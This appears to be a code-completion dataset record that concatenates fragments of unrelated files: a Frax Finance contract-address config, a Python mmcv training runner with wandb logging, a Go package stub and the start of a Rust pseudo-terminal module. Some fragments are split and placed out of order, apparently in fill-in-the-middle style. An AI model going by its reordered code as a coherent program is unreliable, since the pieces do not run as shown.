// "keeper_kUSDC_Token": '0xac826952bc30504359a099c3a486d44E97415c77',
// "harvest_fUSDC": '0xf0358e8c3CD5Fa238a29301d0bEa3D63A17bEdBE',
// "harvest_DepositHelper": '0xF8ce90c2710713552fb564869694B2505Bfc0846',
// "harvest_NoMintRewardPool": '0x4F7c28cCb0F1Dbd1388209C67eEc234273C878Bd'
},
collateral: {
USDC: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
USDC_V2: '0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',
USDT: '0xdAC17F958D2ee523a2206206994597C13D831ec7'
},
governance: '0xd74034C6109A23B6c7657144cAcBbBB82BDCB00E',
bond_issuers: {
issuer_v1: ''
},
pools: {
USDC: '0x3C2982CA260e870eee70c423818010DfeF212659',
USDC_V2: '0x1864Ca3d47AaB98Ee78D11fc9DCC5E7bADdA1c0d',
USDT: '0x7d3FCd3825AE54E8E8FFD3d0ce95882330d54968'
},
uniswap_other: {
router: '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
factory: '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f',
v3_positions_NFT: '0xC36442b4a4522E871399CD717aBDD847Ab11FE88'
},
pricing: {
swap_to_price: '0xa61cBe7E326B13A8dbA11D00f42531BE704DF51B',
chainlink_eth_usd: '0xBa6C6EaC41a24F9D39032513f66D738B3559f15a',
chainlink_fxs_usd: '0x679a15fe8B2108fdA30f292C92abCDE3a1246324'
},
bridges: {
eth_side: {
frax: {
avalanche: "",
bsc: "0x533e3c0e6b48010873B947bddC4721b1bDFF9648",
fantom: "0xC564EE9f21Ed8A2d8E7e76c085740d5e4c5FaFbE",
polygon: "0x40ec5B33f54e0E8A33A975908C5BA1c14e5BbbDf",
xdai: "0x88ad09518695c6c3712ac10a214be5109a655671"
},
fxs: {
avalanche: "",
bsc: "",
fantom: "0xC564EE9f21Ed8A2d8E7e76c085740d5e4c5FaFbE",
polygon: "0x40ec5B33f54e0E8A33A975908C5BA1c14e5BbbDf"
}
},
other_side: {
frax: {
avalanche: "0xDC42728B0eA910349ed3c6e1c9Dc06b5FB591f98",
bsc: "0x29cED01C447166958605519F10DcF8b0255fB379",
fantom: "0xaf319E5789945197e365E7f7fbFc56B130523B33",
polygon: "0x104592a158490a9228070E0A8e5343B499e125D0"
},
fxs: {
avalanche: "0xD67de0e0a0Fd7b15dC8348Bb9BE742F3c5850454",
bsc: "0xDE2F075f6F14EB9D96755b24E416A53E736Ca363",
fantom: "0x82F8Cb20c14F134fe6Ebf7aC3B903B2117aAfa62",
polygon: "0x3e121107F6F22DA4911079845a470757aF4e1A1b"
}
}
},
misc: {
timelock: '0x8412ebf45bAC1B340BbE8F318b928C466c4E39CA',
migration_helper: '0xe16723A08Ae054a8F20BDc0395389569011e78D6',
mint_utilities: '0xE054C1ab5D548E0144ab3F89a8f5809137819906',
staking_utilities: '0xE4de6E1DF1FE135D6462554d0Fd36A14d787f689',
investor_amo_V1: '0xEE5825d5185a1D512706f9068E69146A54B6e076',
investor_amo: '0xB8315Af919729c823B2d996B1A6DDE381E7444f1', // Old proxy: 0x2B4d259a8f6E765AD881C4C1D04045D629dA01b4
// investor_amo_impl: '0xde3c8aa7f53a69c595b7720045000a68cb9cb341', // Old V3: 0xEccA5a27B4f8f92a2bFFd006F20168A7188C0A0C, Old V2: '0xEE5825d5185a1D512706f9068E69146A54B6e076', // Old: 0xe09394AE14d7c3b1798e4dbEa4c280973B2689A4
// investor_amo_admin: '0x069c24600c2A03147D4E1D9b04d193151676F577',
lending_amo: '0x9507189f5B6D820cd93d970d67893006968825ef', // Old: 0xDA9d06166c2085988920Fb35EB2d322B4aaDF1EE
curve_amo_V1: '0xbd061885260F176e05699fED9C5a4604fc7F2BDC',
curve_amo_V2: '0xD103FEf74D05FbC20B5184FE85c7187735355DB3', // Old: 0xeF8c0b4902b985bF64B8cfF6BbCD0AC1FDc8d5d3, Proxy: 0x7e983e4f98b16cee76f8f9a6a1e87b5861de8769
curve_amo: '0x72170Cdc48C33a6AE6B3E83CD387ca3Fb9105da2', // Impl: 0xC3204838aF4CE0597476aDF367B4C9a3cf9a1B51
// curve_amo_impl: '0x5840db064e17480f8e8e74fd6714c9c316f7ddfe', // Old2: 0xbd061885260F176e05699fED9C5a4604fc7F2BDC, Old1: 0x77746DC37Deae008c7149EDc1b1A8D6d63e08Be5, Old2: 0x25e9702359bAf56E505F0BA981eeBFA23ceB030A, Old3: 0x19a47F38D39692617C9D9012eC0176C9ead00a5e
curve_amo_admin: '0x900909C07c2761d84C5d863FF5905102916DF69C',
fxs_1559_amo: '0x9C6a04871D11b33645ab592f68C41bb2B41F51EE', // Old1: '0xaf02be5968D8Fe9536e24E4c7e888C59A58Bc077'
fxs_1559_amo_v2: '0xC80C48862E4254F37047235298eDb6AA35717C24', // Proxy
stakedao_amo: '0x375278D3C65f29C1A90E8550888f1439cFeFe465', // Impl: 0xcf1e6926b2167f83ec3300bed04a672abd93e646
ohm_amo: '0x5699d20732a2EFa9A895EF04bb210aa751C4dB96', // Impl: 0x89a5CeC88598c0CE4d4E331D0b027499edd3dfFa
ohm_amo_admin: "0xE53d45ABe10Ce20427D20c5a1b6360Fa5BA0cE0A",
convex_amo: '0x49ee75278820f409ecd67063D8D717B38d66bd71', // Impl: 0x49f77ddd4d57636ab4c98d8f18ca5f4b5210983d
convex_amo_admin: "0xE53d45ABe10Ce20427D20c5a1b6360Fa5BA0cE0A",
// fxs_1559_amo_v2_impl: '0xCDe9A4e885B87a893b8817D136FD2F404B54294f',
fxs_1559_amo_v2_admin: '0xCaa487D113ad1C34Ce128c4f3a2A437614C6a692', // Proxy admin
frax_gauge_v2: '0x72e158d38dbd50a483501c24f792bdaaa3e7d55c',
crvFRAX_vault: '0xB4AdA607B9d6b2c9Ee07A275e9616B84AC560139',
multisig: '0xFa27873EA2F0eA9DcD2052848C4A7F8ADE8a3936',
vefxs_yield_distributor: "0x19a0a70a68fbC604Bf20A03b787df8f7AC1d50f0",
vefxs_yield_distributor_v2: "0x62C4cf364078C98fA08AfDB4D3d8D87e780Ebd45",
vefxs_yield_distributor_v3: "0xed2647Bbf875b2936AAF95a3F5bbc82819e3d3FE",
frax3crv_curve_fxs_distributor: "0xBBbAf1adf4d39B2843928CCa1E65564e5ce99ccC", // MAY NEED TO CALL APPROVE FIRST
migration_bundle_utils: '0x239c957d42343B3d91FABc7c16E7F1e30Bc32E5B'
},
libraries: {
UniswapV2OracleLibrary: '0xeB85Dd2374a44F80342AcF8010d585Bda32B77a0',
UniswapV2Library: '0xC805D4126C3Ac9d0AD7bb94c3D5cD72E3CbCd6f6',
FraxPoolLibrary: '0xA11B9C88e4Bf89aD9A70f5d408ffB5A6d5FEb6A4',
FraxPoolLibrary_V2: '0xe1C3218134E7c69f3443bbd96A5851d193224f78',
},
reward_tokens: {
sushi: '0x6b3595068778dd592e39a122f4f5a5cf09c90fe2',
curve_dao: '0xd533a949740bb3306d119cc777fa900ba034cd52',
comp: '0xc00e94Cb662C3520282E6f5717214004A7f26888',
fnx: '0xeF9Cd7882c067686691B6fF49e650b43AFBBCC6B',
iq: '0x579CEa1889991f68aCc35Ff5c3dd0621fF29b0C9',
ohm: '0x383518188C0C6d7730D91b2c03a03C837814a899',
// rook: '0xfA5047c9c78B8877af97BDcb85Db743fD7313d4a',
// farm: '0xa0246c9032bC3A600820415aE600c6388619A14D',
// idle: '0x875773784Af8135eA0ef43b5a374AaD105c5D39e'
},
uni_v3_pools: {
NOTE: "Call getPool here (Factory) to find it: 0x1F98431c8aD98523631AE4a59f267346ea31F984",
NOTE2: "Do hardhat verify with the v1.0.0 uniswap-v3-core fork",
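// Illustrative only (fee tier assumed): calling factory.getPool(FRAX, USDC, 500)
// on the factory address above returns the 0.05%-fee-tier pool listed below.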
'Uniswap V3 FRAX/USDC': '0xc63B0708E2F7e69CB8A1df0e1389A98C35A76D52', // Uniswap V3 Pool
},
pair_tokens: {
'Uniswap FRAX/WETH': '0xFD0A40Bc83C5faE4203DEc7e5929B446b07d1C76',
'Uniswap FRAX/USDC': '0x97C4adc5d28A86f9470C70DD91Dc6CC2f20d2d4D',
'Uniswap V3 FRAX/USDC': '0xC36442b4a4522E871399CD717aBDD847Ab11FE88', // Uniswap V3 Positions NFT
'Uniswap FRAX/FXS': '0xE1573B9D29e2183B1AF0e743Dc2754979A40D237',
'Uniswap FXS/WETH': '0xecBa967D84fCF0405F6b32Bc45F4d36BfDBB2E81',
'Uniswap FRAX/IQ': '0xd6c783b257e662ca949b441a4fcb08a53fc49914',
'Uniswap FRAX/OHM': '0x2dce0dda1c2f98e0f171de8333c3c6fe1bbf4877',
// 'Sushi FRAX/FXS': '0xc218001e3D102e3d1De9bf2c0F7D9626d76C6f30',
// 'Sushi FXS/WETH': '0x61eB53ee427aB4E007d78A9134AaCb3101A2DC23',
// 'Curve FRAX-DAI-USDC-USDT': '0x83D2944d5fC10A064451Dc5852f4F47759F249B6', // Proxied Implementation: https://etherscan.io/address/0x2c7796c0590cc100d70af473993890d457cb2ac9#code
'Curve FRAX3CRV-f-2': '0xd632f22692fac7611d2aa1c0d552930d43caed3b', // Proxied For: https://etherscan.io/address/0x5f890841f657d90e081babdb532a05996af79fe6
'Saddle alUSD/FEI/FRAX/LUSD': '0xd48cF4D7FB0824CC8bAe055dF3092584d0a1726A'
},
staking_contracts: {
'Uniswap FRAX/WETH': '0xD875628B942f8970De3CcEaf6417005F68540d4f',
'Uniswap FRAX/USDC': '0xa29367a3f057F3191b62bd4055845a33411892b6',
'Uniswap V3 FRAX/USDC': '0xCbe6ea4725e4ba34aa215B95239DfA6E8854B49a', // Old2: '0x1C21Dd0cE3bA89375Fc39F1B134AD15671022660', // Old1: '0xF397Abd7495EB6FE4697F45b5BA17166f03533b9'
'Uniswap FRAX/FXS': '0xda2c338350a0E59Ce71CDCED9679A3A590Dd9BEC',
'Uniswap FXS/WETH': '0xDc65f3514725206Dd83A8843AAE2aC3D99771C88',
'Uniswap FRAX/IQ': '0xF37057823910653a554d996B49E3399DC87fAE1b', // V1: '0x35fc5Fd90e06c47c0D9dEBfEDB1daF55bCE14E6d',
'Uniswap FRAX/OHM': '0xfC77A420f56Dec53e3b91D7FC936902e132335FF',
// 'Sushi FRAX/FXS': '0x35302f77E5Bd7A93cbec05d585e414e14B2A84a8',
// 'Sushi FXS/WETH': '0x74C370990C1181303D20e9f0252437a97518B95B',
// 'Curve FRAX-DAI-USDC-USDT': '0xB88107bFB7aa9b6A5eC8784374018073e76d4DF0',
// 'Curve FRAX3CRV-f-2': '0xdFb6ef63eA2753C6598fcA1b220358F17E4d137e'
// 'Saddle alUSD/FEI/FRAX/LUSD': ""
},
external_farm_tokens: {
"Snowball S3F (FRAX + TUSD + USDT)": "",
// "SpiritSwap FRAX/FXS": "",
// "SpiritSwap FRAX/FTM": "",
// "QuickSwap FRAX/FXS": "0x4756ff6a714ab0a2c69a566e548b59c72eb26725",
// "QuickSwap FRAX/QUICK": "0x2aa7a18ceabf2ef893d2f7c0145cc45e6f10b223",
"Cream FRAX Lending": "",
"Curve FRAX3CRV-f-2": "",
"Yearn crvFRAX Vault (V2)": "",
"Sushi FRAX/FXS [Polygon]": "0xd53a56ae0f48c9a03660cd36c2e4ae20493a1eca",
"Sushi FRAX/USDC [Polygon]": "0x9e20a8d3501bf96eda8e69b96dd84840058a1cb0",
}
},
bsc: {
main: {
FRAX: '0x29ced01c447166958605519f10dcf8b0255fb379',
FXS: '0xde2f075f6f14eb9d96755b24e416a53e736ca363',
},
reward_tokens: {
cake: '0x0e09fabb73bd3ade0a17ecc321fd13a19e81ce82',
impossible_finance: '0xB0e1fc65C1a741b4662B813eB787d369b8614Af1',
},
pair_tokens: {
// 'PancakeSwap FRAX/FXS': '0x444be928a0091affe2be000f3ff904bc51b0172c',
// 'PancakeSwap FRAX/BUSD': '0x5C2c4df29748144A7177B4185828693FE375AF00',
'Impossible FRAX/IF': '0x9CA691841f1F5A0AE1B5A1eb125dE3c215f0b747',
'Impossible FXS/IF': '0x725aFC77770e023E18C1a07Cc7E2d1a42bA5F123',
},
staking_contracts: {
'Impossible FRAX/IF': '0x45dD6e5f65A5a526c09A50D612e3516ed6AB47d2',
}
}
// ropsten: {
// main: {
// FRAX: '0x5cD30EC40b6da67B65cFCd7A6C8c692AE70232a4',
// FXS: '0xd7145834f0d3D2F47f441F9302A095bd607C408d',
// vesting: 'NOT_DEPLOYED_YET'
// },
// weth: '0x9533696FdAd12ed1FC7917e9b56A8d549Df5d2b9',
// oracles: {
// FRAX_WETH: '0x6B1cA4438cb8f5E2797A4FC4F6F26CC9FF36C322',
// FRAX_USDC: '0x0d28d4330fDC8eE043B4336edA75Ae0A6c5dEE20',
// FRAX_USDT: '0x2c4C60255019334f1D73EEf25894248e0F419b50',
// FRAX_FXS: '0xBca2ADab420BB3928eEc843fa2039384Bfb19FD4',
// FXS_WETH: '0x87634e2b8e326925d8375995681808D754e56481',
// FXS_USDC: '0xdAf03fB7A1440Bfc724b3C7F4CF047C3aA4510A9',
// FXS_USDT: '0xDB0eD8ba93bcae27b624FFD0673FA75db11b4082',
// USDC_WETH: '0x0E6ad3EB50Fdd0EBcd45506dbF950b7d145128cc',
// USDT_WETH: '0x18390B775fd488c31a29c4E413ea04814554cFad'
// },
// collateral: {
// USDC: '0x62463ed90eE009fbea795D1049D44992a3612c7A',
// USDT: '0xBdD17dE7975765bC79C15F76967e2B7981887DbF'
// },
// governance: '0x4a8368662339D69377FF5bA77560DC6B907bCD85',
// pools: {
// USDC: '0xE0Df8E66BaE4aDdb8ec53C351cEC99e8A7240759',
// USDT: '0x4e61CF85ec7Aef00d3Fc02784C40Ff07283c2ceC'
// },
// uniswap_other: {
// router: '0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D',
// factory: '0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f'
// },
// pricing: { swap_to_price: '0xfE421F7abb81Fc6D1E092a60139a12a3b6be8ba8' },
// misc: {
// timelock: '0x6648307DFA2604B78595a1711118f92b04028eB4',
// migration_helper: '0xe13822b795EC5c5dD248a1CdC7B923B7d8c701D0'
// },
// libraries: {
// UniswapV2OracleLibrary: '0x8A0C94E55d574C0652757C879BC89C9698076EF8',
// UniswapV2Library: '0x0E207C1332B7B9108417dE9134bd621CF212Db72',
// FraxPoolLibrary: '0x144E03F0eA54b67EB26C0CF5a06028E99670d0FB'
// },
// pair_tokens: {
// 'Uniswap FRAX/WETH': '0x9A0b2d1C641561949f5f770711C3B05F86AB684e',
// 'Uniswap FRAX/USDC': '0x2Fa9D5bd5B04f12bD5e7be02a59C281Df66c817f',
// 'Uniswap FRAX/FXS': '0xC8b9A764d895E88F8D3383AeB599fE6F38503ef8',
// 'Uniswap FXS/WETH': '0x02F823CDc4C1adE61C51346CEDFE0bB242f554C0'
// },
// staking_contracts: {
// 'Uniswap FRAX/WETH': '0xE970806d91699eB59F08D849b248fc294302C05c',
// 'Uniswap FRAX/USDC': '0xF02f75ffdA683fe98784E1CA048D779d5cE68174',
// 'Uniswap FRAX/FXS': '0x7a646162bE361c2ae96d57920a06200544cf0c4F',
// 'Uniswap FXS/WETH': '0x5B05E43546534f81CcBcb10D33B03Ac02fab1201'
// }
// },
// ganache: {
// main: {
// FRAX: '0x4c2a7b591668988C6db9184d9df9394846Bc492d',
// FXS: '0xc2Bb9a3ae435AC36cC1eD2c4F64910B0CF8d8ec6',
// vesting: '0x68565D3dDDEe130152536d39eeD3c22A6653E584'
// },
// weth: '0x9970c452f919b117b9A5dDa473Cf205B6446f104',
// oracles: {
// FRAX_WETH: '0xB6F388B031C74936c53d51Cd850b0a8A8879c136',
// FRAX_USDC: '0x3013CeBaF374D838426bb2f3EEF6DA86D2552c27',
// FRAX_USDT: '0x1a6B2699FE1E833C28C1c9CF69bc55b2aa4a821B',
// FRAX_6DEC: '0x0037b9708901674243F823bbCE425b455e1C7825',
// FRAX_FXS: '0xeb3d1033E0B1ADE4f122A0174142dD2827A29eFd',
// FXS_WETH: '0xD48FeeDBb2f79bCc61c1661Bb5C550dE5c03b052',
// FXS_USDC: '0xD234BD8098cECB9CcbFf4Bf997f9B77408EC7C78',
// FXS_USDT: '0x279dB552A0f507DCd6F073b8d687eF0927959DcF',
// FXS_6DEC: '0x687e2a83f24FA1584f7aC272Ef8f5F510ea8F0A9',
// USDC_WETH: '0x8564DA758dcb6577F87C6d9c1b53f13777018602',
// USDT_WETH: '0xeC5C28352B0e8F9Eaf12239c86996e964298d60c',
// '6DEC_WETH': '0x12711D46063C413dA53d079e88c757b003b3513e'
// },
// collateral: {
// USDC: '0xff0B79ff7E0d0f5530dbb7Fa351cF9914Ab3f4E9',
// USDT: '0xD2A6475d9434CdE3Be7cD36debDC51C187be7dbD',
// '6DEC': '0x24ce4B5c5209678452fe236BD58A2e64F1d970b6'
// },
// governance: '0xB6D19571bDC969673b7fA8080D5D80CD80b2D312',
// pools: {
// USDC: '0xeF6981031cCaFfc9B4761A1dc6C5adAa495438c1',
// USDT: '0x8c2B93A83D1f60329df986e4f4219830f8f0bE9d',
// '6DEC': '0xd32fE8cc271214d911003c0011dB1f9AD796602c'
// },
// uniswap_other: { | // },
// pricing: { swap_to_price: '0xeF2c3d7D30d2893b787c0546f9A97084b4A8F10b' },
// misc: {
// timelock: '0xaD98E1e5fe7B9e79783373faE69632390f7825A0',
// migration_helper: '0xe40a86Fb20E497B423ff88c8deA4aa9994D4dC62'
// },
// libraries: {
// UniswapV2OracleLibrary: '0xF9814413328Cc3B8B92Fd3B251461b34552f7f42',
// UniswapV2Library: '0x43098B53277892e7eb9Be480Ef7054124591cE16',
// FraxPoolLibrary: '0x992A40bfF600fd2A1B7C214F61904Db6931403af'
// },
// pair_tokens: {
// 'Uniswap FRAX/WETH': '0x3483F272aba04b5dd819A4CdB3c4007dF909913c',
// 'Uniswap FRAX/USDC': '0xfBf1D205ADC586ad469A5a1a2a9451B2b4Bf1243',
// 'Uniswap FRAX/FXS': '0x7D6AD49359D3f9d0DCd7482FfD86B9C3b5a5a12D',
// // 'Uniswap FXS/WETH': '0x185c0F6A6e1D0998A22f3DA95BCc1F74b0A08Dd2'
// },
// staking_contracts: {
// 'Uniswap FRAX/WETH': '0x13c9aE42c43DF2FB46218DF80b6Abad7D52a82C5',
// 'Uniswap FRAX/USDC': '0x3b9c2b598589578e640627d8975De51ea7928918',
// 'Uniswap FRAX/FXS': '0xd4119c5057237373c629eD9F83B79635a3e2e90b',
// // 'Uniswap FXS/WETH': '0x6135f354e143fbEB5fB159A76EB2590cf4f086b6'
// }
// }
}
export { }; // Force this file to be a module | // router: '0x8Be085050e221bd8Db17489bD853800e600f6f58',
// factory: '0xF70bB588d44509a214Ad260C84BA0cfB031c29c5' |
my_runner.py | # Copyright (c) OpenMMLab. All rights reserved.
import os.path as osp
import platform
import shutil
import time
import warnings
import torch
import mmcv
import wandb
from mmcv.runner.hooks import HOOKS, Hook
from mmcv.runner.base_runner import BaseRunner
from mmcv.runner.builder import RUNNERS
from mmcv.runner.checkpoint import save_checkpoint
from mmcv.runner.utils import get_host_info
import copy
import logging
from abc import ABCMeta, abstractmethod
from torch.optim import Optimizer
from mmcv.parallel import is_module_wrapper
from mmcv.runner.checkpoint import load_checkpoint
from mmcv.runner.dist_utils import get_dist_info
from mmcv.runner.log_buffer import LogBuffer
from mmcv.runner.priority import Priority, get_priority
from mmcv.runner.utils import get_time_str
@RUNNERS.register_module()
class MyRunner(BaseRunner):
"""Epoch-based Runner.
This runner trains models epoch by epoch.
"""
def __init__(self,
model,
batch_processor=None,
optimizer=None,
work_dir=None,
logger=None,
meta=None,
max_iters=None,
max_epochs=None,
with_wandb=None):
if batch_processor is not None:
if not callable(batch_processor):
raise TypeError('batch_processor must be callable, '
f'but got {type(batch_processor)}')
warnings.warn(
'batch_processor is deprecated, please implement '
'train_step() and val_step() in the model instead.',
DeprecationWarning)
# raise an error if `batch_processor` is not None and
# `model.train_step()` exists.
if is_module_wrapper(model):
_model = model.module
else:
_model = model
if hasattr(_model, 'train_step') or hasattr(_model, 'val_step'):
raise RuntimeError(
'batch_processor and model.train_step()/model.val_step() '
'cannot be both available.')
else:
assert hasattr(model, 'train_step')
# check the type of `optimizer`
if isinstance(optimizer, dict):
for name, optim in optimizer.items():
if not isinstance(optim, Optimizer):
raise TypeError(
f'optimizer must be a dict of torch.optim.Optimizers, '
f'but optimizer["{name}"] is a {type(optim)}')
elif not isinstance(optimizer, Optimizer) and optimizer is not None:
raise TypeError(
f'optimizer must be a torch.optim.Optimizer object '
f'or dict or None, but got {type(optimizer)}')
# check the type of `logger`
if not isinstance(logger, logging.Logger):
raise TypeError(f'logger must be a logging.Logger object, '
f'but got {type(logger)}')
# check the type of `meta`
if meta is not None and not isinstance(meta, dict):
raise TypeError(
f'meta must be a dict or None, but got {type(meta)}')
self.model = model
self.batch_processor = batch_processor
self.optimizer = optimizer
self.logger = logger
self.meta = meta
self.with_wandb = with_wandb
# create work_dir
if mmcv.is_str(work_dir):
self.work_dir = osp.abspath(work_dir)
mmcv.mkdir_or_exist(self.work_dir)
elif work_dir is None:
self.work_dir = None
else:
raise TypeError('"work_dir" must be a str or None')
# get model name from the model class
if hasattr(self.model, 'module'):
self._model_name = self.model.module.__class__.__name__
else:
self._model_name = self.model.__class__.__name__
self._rank, self._world_size = get_dist_info()
self.timestamp = get_time_str()
self.mode = None
self._hooks = []
self._epoch = 0
self._iter = 0
self._inner_iter = 0
if max_epochs is not None and max_iters is not None:
raise ValueError(
'Only one of `max_epochs` or `max_iters` can be set.')
self._max_epochs = max_epochs
self._max_iters = max_iters
# TODO: Redesign LogBuffer, it is not flexible and elegant enough
self.log_buffer = LogBuffer()
def register_optimizer_hook(self, optimizer_config):
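# Accept either a config dict (built through mmcv's HOOKS registry, with the
# type defaulting to the custom 'MyHook') or an already-constructed hook object.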
if optimizer_config is None:
return
if isinstance(optimizer_config, dict):
optimizer_config.setdefault('type', 'MyHook')
hook = mmcv.build_from_cfg(optimizer_config, HOOKS)
else:
hook = optimizer_config
self.register_hook(hook, priority='ABOVE_NORMAL')
def run_iter(self, data_batch, train_mode, **kwargs):
if self.batch_processor is not None:
outputs = self.batch_processor(
self.model, data_batch, train_mode=train_mode, **kwargs)
elif train_mode:
outputs = self.model.train_step(data_batch, self.optimizer,
**kwargs)
else:
outputs = self.model.val_step(data_batch, self.optimizer, **kwargs)
if not isinstance(outputs, dict):
raise TypeError('"batch_processor()" or "model.train_step()"'
'and "model.val_step()" must return a dict')
if 'log_vars' in outputs:
self.log_buffer.update(outputs['log_vars'], outputs['num_samples'])
self.outputs = outputs
def train(self, data_loader, **kwargs):
self.model.train()
self.mode = 'train'
self.data_loader = data_loader
self._max_iters = self._max_epochs * len(self.data_loader)
self.call_hook('before_train_epoch')
time.sleep(2) # Prevent possible deadlock during epoch transition
for i, data_batch in enumerate(self.data_loader):
self._inner_iter = i
self.call_hook('before_train_iter')
self.run_iter(data_batch, train_mode=True, **kwargs)
self.call_hook('after_train_iter') |
@torch.no_grad()
def val(self, data_loader, **kwargs):
self.model.eval()
self.mode = 'val'
self.data_loader = data_loader
self.call_hook('before_val_epoch')
time.sleep(2) # Prevent possible deadlock during epoch transition
for i, data_batch in enumerate(self.data_loader):
self._inner_iter = i
self.call_hook('before_val_iter')
self.run_iter(data_batch, train_mode=False)
self.call_hook('after_val_iter')
self.call_hook('after_val_epoch')
# Log averaged validation metrics once per epoch; under distributed
# training only rank 0 reports, matching the single-GPU behavior.
is_main_process = (not torch.distributed.is_initialized()
or torch.distributed.get_rank() == 0)
if self.with_wandb and is_main_process:
hist = self.log_buffer.val_history
wandb.log({
"CE val loss": sum(hist['loss_deepsets_ce']) / len(hist['loss_deepsets_ce']),
"val ds_acc": sum(hist['ds_acc']) / len(hist['ds_acc']),
"val iou_error": sum(hist['iou_error']) / len(hist['iou_error']),
"val max score predictions": sum(hist['ds_pred_on_max']) / len(hist['ds_pred_on_max']),
})
def run(self, data_loaders, workflow, max_epochs=None, **kwargs):
"""Start running.
Args:
data_loaders (list[:obj:`DataLoader`]): Dataloaders for training
and validation.
workflow (list[tuple]): A list of (phase, epochs) to specify the
running order and epochs. E.g, [('train', 2), ('val', 1)] means
running 2 epochs for training and 1 epoch for validation,
iteratively.
"""
assert isinstance(data_loaders, list)
assert mmcv.is_list_of(workflow, tuple)
assert len(data_loaders) == len(workflow)
if max_epochs is not None:
warnings.warn(
'setting max_epochs in run is deprecated, '
'please set max_epochs in runner_config', DeprecationWarning)
self._max_epochs = max_epochs
assert self._max_epochs is not None, (
'max_epochs must be specified during instantiation')
for i, flow in enumerate(workflow):
mode, epochs = flow
if mode == 'train':
self._max_iters = self._max_epochs * len(data_loaders[i])
break
work_dir = self.work_dir if self.work_dir is not None else 'NONE'
self.logger.info('Start running, host: %s, work_dir: %s',
get_host_info(), work_dir)
self.logger.info('Hooks will be executed in the following order:\n%s',
self.get_hook_info())
self.logger.info('workflow: %s, max: %d epochs', workflow,
self._max_epochs)
self.call_hook('before_run')
while self.epoch < self._max_epochs:
for i, flow in enumerate(workflow):
mode, epochs = flow
if isinstance(mode, str): # self.train()
if not hasattr(self, mode):
raise ValueError(
f'runner has no method named "{mode}" to run an '
'epoch')
epoch_runner = getattr(self, mode)
else:
raise TypeError(
'mode in workflow must be a str, but got {}'.format(
type(mode)))
for _ in range(epochs):
if mode == 'train' and self.epoch >= self._max_epochs:
break
epoch_runner(data_loaders[i], **kwargs)
time.sleep(1) # wait for some hooks like loggers to finish
self.call_hook('after_run')
def save_checkpoint(self,
out_dir,
filename_tmpl='end2end_epoch_{}.pth',
save_optimizer=True,
meta=None,
create_symlink=True):
"""Save the checkpoint.
Args:
out_dir (str): The directory that checkpoints are saved.
filename_tmpl (str, optional): The checkpoint filename template,
which contains a placeholder for the epoch number.
Defaults to 'end2end_epoch_{}.pth'.
save_optimizer (bool, optional): Whether to save the optimizer to
the checkpoint. Defaults to True.
meta (dict, optional): The meta information to be saved in the
checkpoint. Defaults to None.
create_symlink (bool, optional): Whether to create a symlink
"latest.pth" to point to the latest checkpoint.
Defaults to True.
"""
if meta is None:
meta = {}
elif not isinstance(meta, dict):
raise TypeError(
f'meta should be a dict or None, but got {type(meta)}')
if self.meta is not None:
meta.update(self.meta)
# Note: meta.update(self.meta) should be done before
# meta.update(epoch=self.epoch + 1, iter=self.iter) otherwise
# there will be problems with resumed checkpoints.
# More details in https://github.com/open-mmlab/mmcv/pull/1108
meta.update(epoch=self.epoch + 1, iter=self.iter)
filename = filename_tmpl.format(self.epoch + 1)
filepath = osp.join(out_dir, filename)
optimizer = self.optimizer if save_optimizer else None
save_checkpoint(self.model, filepath, optimizer=optimizer, meta=meta)
# in some environments, `os.symlink` is not supported, you may need to
# set `create_symlink` to False
if create_symlink:
dst_file = osp.join(out_dir, 'latest.pth')
if platform.system() != 'Windows':
mmcv.symlink(filename, dst_file)
else:
shutil.copy(filepath, dst_file)
# @RUNNERS.register_module()
# class Runner(MyRunner):
# """Deprecated name of EpochBasedRunner."""
#
# def __init__(self, *args, **kwargs):
# warnings.warn(
# 'Runner was deprecated, please use EpochBasedRunner instead',
# DeprecationWarning)
# super().__init__(*args, **kwargs) | self._iter += 1
self.call_hook('after_train_epoch')
self._epoch += 1 |
output_string.go | package armtemplate |
||
pty.rs | use nix::errno::Errno;
use nix::fcntl::{open, OFlag};
use nix::pty::{grantpt, posix_openpt, ptsname, unlockpt, PtyMaster};
use nix::sys::epoll::{epoll_create, epoll_ctl, epoll_wait, EpollEvent, EpollFlags, EpollOp};
use nix::sys::stat::Mode;
use nix::sys::termios;
use nix::unistd::{close, dup2, read, setsid, write};
use std::cmp::min;
use std::convert::TryInto;
use std::io;
use std::os::unix::io::AsRawFd;
use std::os::unix::io::RawFd;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::time::{Duration, Instant};
use crate::filter::Filter;
// Check at .1 / .5 / 2.5 / 12.5 / .... / 60 seconds
const MIN_CHECK_INTERVAL: std::time::Duration = Duration::from_millis(100);
const MAX_CHECK_INTERVAL: std::time::Duration = Duration::from_secs(60);
const CHECK_INTERVAL_MULTIPLIER: u32 = 5;
const STDIN: RawFd = 0;
const STDOUT: RawFd = 1;
struct RawInput {
orig_attr: termios::Termios,
}
impl RawInput {
fn setup() -> nix::Result<RawInput> {
let orig_attr = termios::tcgetattr(0)?;
let mut new_attr = orig_attr.clone();
termios::cfmakeraw(&mut new_attr);
termios::tcsetattr(0, termios::SetArg::TCSAFLUSH, &new_attr)?;
Ok(RawInput { orig_attr })
}
}
impl Drop for RawInput {
fn drop(&mut self) {
if let Err(e) = termios::tcsetattr(0, termios::SetArg::TCSAFLUSH, &self.orig_attr) {
println!("Can't restore terminal settings: {}", e);
}
}
}
fn write_all(fd: RawFd, buf: &[u8]) -> nix::Result<()> {
let mut written = 0;
while written < buf.len() {
match write(fd, &buf[written..]) {
Ok(write_count) => written += write_count,
Err(nix::Error::Sys(Errno::EINTR)) => {}
Err(e) => return Err(e),
}
}
Ok(())
}
struct Buffer {
buf: Vec<u8>,
count: usize,
}
impl Buffer {
fn new() -> Self {
Buffer {
buf: vec![0; 4096],
count: 0,
}
}
fn fill(&mut self, fd: RawFd) -> nix::Result<bool> {
match read(fd, &mut self.buf[self.count..]) {
Ok(0) => Ok(false),
Ok(count) => {
self.count += count;
Ok(true)
}
Err(e) => Err(e),
}
}
fn flush(&mut self, fd: RawFd) -> nix::Result<()> {
write_all(fd, &self.buf[0..self.count])?;
self.count = 0;
Ok(())
}
}
struct FilteredBuffer {
raw: Buffer,
filter: Filter,
}
impl FilteredBuffer {
fn new() -> Self {
